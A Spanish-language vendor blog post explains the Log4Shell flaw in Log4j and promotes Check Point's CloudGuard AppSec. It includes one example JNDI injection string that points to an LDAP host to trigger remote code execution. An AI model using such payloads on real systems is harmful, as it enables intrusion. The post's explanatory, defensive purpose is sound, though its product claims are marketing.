top of page
  • Foto del escritorInternational IT

Log4Shell: Apache Failure Log4j deja a gran parte de Internet vulnerable

Grandes corporaciones como Twitter, Steam, Apple, Minecraft, Amazon, Tencent, NetEase, Elastic y Baidu ya han identificado que son vulnerables a los ataques Log4Shell, que afectan el marco de registro de código abierto Log4j. Vale la pena señalar que miles de empresas y servicios más pequeños también deben verse comprometidos sin saberlo todavía.




¿Qué es Log4j?


El marco de trabajo de registro de código abierto Log4j es una biblioteca ampliamente utilizada por muchas empresas en sus aplicaciones web. Log4j es la biblioteca de registro de Java más popular del mundo, con más de 400.000 descargas en GitHub. La herramienta es utilizada por grandes empresas como Twitter, Amazon, Microsoft, Apple, Minecraft, Cloudflare y miles más.


¿Qué fue explorado?


Apache Software Foundation ha clasificado la vulnerabilidad conocida como Log4Shell o LogJam como "crítica" y ha lanzado una actualización en un intento de contener futuras vulnerabilidades. Log4Shell también recibió la puntuación CVSS más alta de 10. En un comunicado, la fundación dijo:

Un atacante que pueda rastrear mensajes de registro o parámetros de mensajes de registro podría ejecutar código arbitrario cargado desde servidores LDAP cuando la anulación de búsqueda de mensajes está habilitada. A partir de Log4j 2.15.0, este comportamiento se ha desactivado de forma predeterminada.

¿Cómo son los ataques?


Los Logs no se utilizan a menudo como vectores de ataque, por lo que esta vulnerabilidad ha tomado por sorpresa a tantas organizaciones. En este caso, la vulnerabilidad Log4Shell está contenida en un plug-in que proporciona una forma para que las aplicaciones Java recuperen objetos almacenados en un directorio DNS o LDAP. El plug-in JNDI Lookup contiene la vulnerabilidad Log4Shell; en general, las consultas solo deben incluir el nombre del objeto. Sin embargo, cuando se ingresa una URL en lugar del nombre del objeto, por ejemplo, ${jndi: ldap: //website.com/rce}, Log4j se conectará a JNDI en el servidor especificado y obtendrá el objeto Java, permitiendo así la ejecución remota de código. en el servidor de registro.


CloudGuard AppSec: protección preventiva para sus aplicaciones web


Los clientes de Check Point que utilizan CloudGuard AppSec configurado en el modo Prevent están protegidos contra ataques de día cero. El motor de inteligencia artificial contextual (IA) que impulsa la solución reconoce automáticamente cualquier intento de explotar la herramienta Log4j y la bloquea, mucho antes de que se detecte o explote la vulnerabilidad Log4Shell.


A diferencia de los WAF tradicionales, que generan muchos falsos positivos, CloudGuard AppSec ofrece precisión predictiva. La solución también incluye protección IPS con tecnología Threat Cloud, lo que garantiza que todas las aplicaciones web estén protegidas automáticamente sin la necesidad de implementar, actualizar o instalar nada de manera proactiva.


El motor de inteligencia artificial contextual de CloudGuard crea una puntuación de riesgo para cada solicitud de aplicación. Al considerar todos los parámetros contextuales de una solicitud, la solución puede identificar con precisión un ataque sin intervención humana. CloudGuard construye este puntaje de riesgo aprendiendo del uso de la aplicación a lo largo del tiempo, y el resultado es una seguridad preventiva que filtra los falsos positivos al tiempo que brinda prevención de ataques de día cero. Es decir, la vulnerabilidad de Log4Shell no tuvo ningún impacto en los clientes de CloudGuard AppSec que están automáticamente protegidos de este tipo de ataques.



 

Cuente con TI internacional para proteger a su empresa de los ciberataques con los mejores Next Generation Firewalls del mercado

Entradas Recientes

Ver todo

Comments


Nos acompanhe nas redes sociais!

1200X628 - SAND.png
1200X628 -NOC.png

Ver todos os materiais gratuitos

bottom of page